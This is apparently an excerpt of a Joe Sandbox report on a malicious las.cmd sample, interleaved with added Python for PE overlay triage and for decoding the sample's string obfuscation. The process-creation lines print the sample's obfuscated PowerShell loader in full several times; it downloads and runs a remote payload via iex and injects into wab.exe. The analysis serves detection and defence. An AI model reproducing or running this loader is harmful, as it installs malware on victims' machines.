              Source: ConfigSecurityPolicy.exe.8.drStatic PE information: Data appended to the last section found
              Source: grv_icons.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateComRegisterShell64.exe.8.drStatic PE information: Data appended to the last section found
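The long run of "Data appended to the last section found" findings above (MsMpEng.exe, GoogleUpdate.exe, java.exe, the AutoIt tools, and so on, all written by the wab.exe process) is the static trace that an appending file infector leaves behind: bytes exist past the end of the last section's raw data. The check is cheap to reproduce, but it has one false positive that matters for exactly these files: an Authenticode signature is also stored in the overlay, so a signed GoogleUpdate.exe or java.exe has trailing data even when clean, and a useful triage check subtracts the certificate table first. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses only the header fields it needs; `build_pe` constructs minimal PE32 images as test input, and the section names, layout and signature blob in it are made up for the demonstration.

```python
"""Overlay triage for PE files: how many bytes follow the last section once an
Authenticode certificate table (which also lives in the overlay) is excluded.
Added example; not part of the Joe Sandbox report or of the analysed sample."""
import struct

FILE_ALIGN = 0x200
SECURITY_DIR = 4            # IMAGE_DIRECTORY_ENTRY_SECURITY (certificate table)


def _u16(b, o):
    return struct.unpack_from("<H", b, o)[0]


def _u32(b, o):
    return struct.unpack_from("<I", b, o)[0]


def pe_overlay(data: bytes) -> dict:
    """Returns sections_end (file offset where section raw data stops), the
    certificate table (offset, size) and the number of trailing bytes that
    neither the sections nor the certificate table account for."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe = _u32(data, 0x3C)                              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = _u16(data, pe + 6)                          # COFF NumberOfSections
    opt_size = _u16(data, pe + 20)                     # COFF SizeOfOptionalHeader
    opt = pe + 24
    dirs = opt + (112 if _u16(data, opt) == 0x20B else 96)   # PE32+ vs PE32
    sig_off = sig_size = 0
    if opt + opt_size >= dirs + (SECURITY_DIR + 1) * 8:
        # For the security directory the "VirtualAddress" is a raw file offset.
        sig_off, sig_size = struct.unpack_from("<II", data, dirs + SECURITY_DIR * 8)
    table = opt + opt_size                             # section table follows opt header
    sections_end = table + 40 * nsec
    for i in range(nsec):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            sections_end = max(sections_end, raw_ptr + raw_size)
    sections_end = min(sections_end, len(data))        # guard against bogus pointers
    unexplained = len(data) - sections_end
    if sig_size and sig_off >= sections_end and sig_off + sig_size <= len(data):
        unexplained -= sig_size                        # signature is legitimate overlay
    return {"sections_end": sections_end,
            "signature": (sig_off, sig_size),
            "unexplained": unexplained}


def build_pe(section_payloads, overlay=b"", signature=b"") -> bytes:
    """Constructed test input: a minimal PE32 with one section per payload, an
    optional certificate blob recorded in the security directory, and optional
    raw appended bytes.  Layout and names are invented for this example."""
    nsec = len(section_payloads)
    opt_size = 0xE0                                    # standard PE32 optional header
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * nsec) // FILE_ALIGN) * FILE_ALIGN
    sec_hdrs, bodies, ptr = b"", b"", hdr_len
    for i, payload in enumerate(section_payloads):
        raw = payload.ljust(-(-len(payload) // FILE_ALIGN) * FILE_ALIGN, b"\0")
        sec_hdrs += struct.pack("<8sIIIIIIHHI", b".sec%d" % i, len(payload),
                                0x1000 * (i + 1), len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        bodies += raw
        ptr += len(raw)
    dirs = bytearray(16 * 8)
    if signature:
        struct.pack_into("<II", dirs, SECURITY_DIR * 8, ptr, len(signature))
    opt = struct.pack("<H", 0x10B).ljust(96, b"\0") + bytes(dirs)   # 224 bytes
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    headers = (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(hdr_len, b"\0")
    return headers + bodies + signature + overlay


if __name__ == "__main__":
    text, sig = [b"\x90" * 10, b"data"], b"\x30\x82" + b"\0" * 100
    for label, image in [("clean", build_pe(text)),
                         ("signed", build_pe(text, signature=sig)),
                         ("appended", build_pe(text, overlay=b"X" * 64)),
                         ("signed+appended", build_pe(text, signature=sig, overlay=b"X" * 64))]:
        print(f"{label:16} {pe_overlay(image)}")
```

Run against a real dropped file the same way (`pe_overlay(open(path, "rb").read())`); a non-zero `unexplained` on a binary that was clean before the sample ran is the finding to chase, while a signed binary whose overlay is exactly its certificate table is not.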
              Source: amsi32_7844.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: VC_redist.x64.exe.8.drStatic PE information: Section: .reloc ZLIB complexity 1.0107421875
              Source: classification engineClassification label: mal100.spre.troj.evad.winCMD@14/164@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Fettle.Han
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dykonr4d.1i4.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7596
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng 
Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 
Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
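The `Udvindende` function at the head of the PowerShell command line in the process list above is the sample's string decoder: it calls `Substring($i, 1)` for i = 5, 11, 17, ... while `$i -lt Length-1`, so it keeps every sixth character of its argument and always drops the last one. `Unschool` then dot-sources `($Jetmotoren)`, which decodes to `iex`. The Python port below is an added example, not code from the Joe Sandbox report or from the sample; the literals it feeds through the decoder are copied from the command line as printed above, and the decoded `$Sprngningers` value is the same sendspace URL the report found in powershell.exe memory. One caveat a practitioner should know: every literal in the sample is a whole number of six-character groups, and the rendered report has collapsed a double space inside the `$Veta13` literal, so that string decodes wrongly from page text; the `looks_intact` length check, the repaired copy of `$Veta13` (whose intended plaintext is the `echo %appdata%\Fettle.Han && echo t` child command line in the same list) and the variable names in the script snippet are this example's own assumptions.

```python
"""Decoder for the string obfuscation used by the las.cmd PowerShell stage.
Added example; not part of the Joe Sandbox report or of the sample itself."""
import re

GROUP = 6   # five junk characters precede each payload character
FIRST = 5   # offset of the first payload character


def udvindende(blob: str) -> str:
    """Port of Udvindende: $Lastelinie = Length - 1;
    For($i = 5; $i -lt $Lastelinie; $i += 6) { $out += Substring($i, 1) }"""
    return "".join(blob[i] for i in range(FIRST, len(blob) - 1, GROUP))


def looks_intact(blob: str) -> bool:
    """Heuristic (this example's own): the sample's literals are whole 6-char groups,
    so any other length means the text was altered in transit, typically a run of
    spaces collapsed when the report was rendered as HTML."""
    return len(blob) % GROUP == 0


# `$name = Udvindende '<blob>'`, with or without spaces around '='.  A single quote
# inside a PowerShell single-quoted string is written '', which the sample does not use.
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*Udvindende\s+'([^']*)'")


def decode_script(script: str) -> dict:
    """Returns {variable: (decoded_value, intact_flag)} for every assignment found."""
    return {name: (udvindende(blob), looks_intact(blob))
            for name, blob in _ASSIGN.findall(script)}


# Literals copied from the report's process-creation line (raw strings: one has a backslash).
PEDICURES = (r"TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r "
             r"Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl "
             r"Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce;"
             r" ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1"
             r"s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0"
             r".dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbf"
             r"FluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ")
PRIVILEGED = r"Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i "
SPRNGNINGERS = (r"juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskow"
                r"Mumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic"
                r" ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/"
                r"Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ")
FORLOVEDE = r"Rel,a>R,kla "
JETMOTOREN = r"Cor,ii KliseCuchix Kyse "
VETA13_RENDERED = (r"SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikket"
                   r"Teg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfa"
                   r"Un,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ")
# Assumption: the child command line `echo %appdata%\Fettle.Han && echo t` in the
# report is the intended plaintext; restoring the second space after "Puebl " (two
# spaces in the original, collapsed by HTML rendering) realigns the groups.
VETA13_REPAIRED = VETA13_RENDERED.replace("Puebl Folk", "Puebl  Folk")

# Script excerpt in the sample's shape, rebuilt from the literals above.
SCRIPT = (
    "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';"
    "Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;"
    "For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){"
    "$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}"
    f"$Pedicures=Udvindende '{PEDICURES}';$Privileged=Udvindende '{PRIVILEGED}';"
    f"$Sprngningers=Udvindende '{SPRNGNINGERS}';$Forlovede=Udvindende '{FORLOVEDE}';"
    f"$Jetmotoren=Udvindende '{JETMOTOREN}';$Veta13 = Udvindende '{VETA13_RENDERED}';"
)

if __name__ == "__main__":
    for name, (value, intact) in decode_script(SCRIPT).items():
        print(f"{name:14} intact={intact!s:5} {value}")
    print("Veta13 repaired:", udvindende(VETA13_REPAIRED))
```

Point `decode_script` at the raw `las.cmd` rather than at report text when the literals matter: the decoder itself is three lines, but whitespace-sensitive obfuscation like this does not survive HTML rendering, and `looks_intact` is the quickest way to see which strings were damaged.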
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 
Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
